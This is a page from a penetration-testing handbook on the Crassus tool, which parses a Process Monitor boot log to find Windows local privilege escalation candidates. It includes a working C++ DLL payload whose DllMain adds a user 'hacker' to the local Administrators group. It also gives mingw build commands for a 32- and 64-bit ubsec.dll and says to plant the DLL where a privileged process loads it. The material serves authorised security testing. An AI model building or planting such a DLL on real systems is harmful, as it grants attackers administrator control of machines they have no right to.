Syslifters Handbook

English

Deutsch

English

Deutsch

Appearance

Crassus

Crassus is both a discovery tool and an enabler for exploitation:

  • It parses a Process Monitor boot log and reports LPE candidates (writable directories on the service search path, missing DLLs referenced by services or scheduled tasks, and binaries that load from user-controlled locations).
  • For each candidate it suggests how to weaponise it (typically a DLL planted in a writable directory that gets loaded by a privileged process at boot or service start).

Collecting a boot log

  1. In ProcMon enable boot logging under Options > Enable Boot Logging
  2. Reboot the machine and open as many programs as you like, don't forget to install tools from the Softwarecenter. Make sure to not use your admin credentials when installing other software.
  3. Reopen ProcMon and save the logfile to C:\Bootlog.pml
  4. After running Crassus.exe C:\Bootlog.pml check the LPE candidates. Redo this step if there are multiple logfiles.
  • The code samples in the stubs directory are mostly non-functional. Find a working code sample below.
  • Compile the code sample.

Compile example from Linux

The following code sample adds the user hacker to the local Administrators group.
Known quirks:

  • The user hacker doesn't exist.
  • The group Administators doesn't exist (in non-English Windows Systems).
  • The binary is compiled for the wrong architecture (32 bit vs 64 bit).
cpp
#include <windows.h>

extern "C" {

  BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
  {
      system("cmd.exe /c net localgroup administrators hacker /add");
      return TRUE;
  }


  #ifdef ADD_EXPORTS

  #endif
}

The following commands compile the ubsec.dll from ubsec.cpp and ubsec.o.

bash
# 32-bit DLL
i686-w64-mingw32-g++ -c -o ubsec.o ubsec.cpp -D ADD_EXPORTS
i686-w64-mingw32-g++ -o ubsec.dll ubsec.o ubsec.def -s -shared -Wl,--subsystem,windows

# 64-bit DLL
x86_64-w64-mingw32-g++ -c -o ubsec.o ubsec.cpp -D ADD_EXPORTS
x86_64-w64-mingw32-g++ -o ubsec.dll ubsec.o ubsec.def -s -shared -Wl,--subsystem,windows

After placing the compiled dll file to the vulnerable location, make the target system execute it (usually by reboot the server or restarting the service).

Local privilege escalation via Kerberos relaying

For the no-fix Kerberos-relay LPE chain (KrbRelay + RBCD or shadow credentials + SCM UAC bypass), see LPE via NTLM and Kerberos relaying. For automated PrivescCheck-based discovery, see PrivescCheck.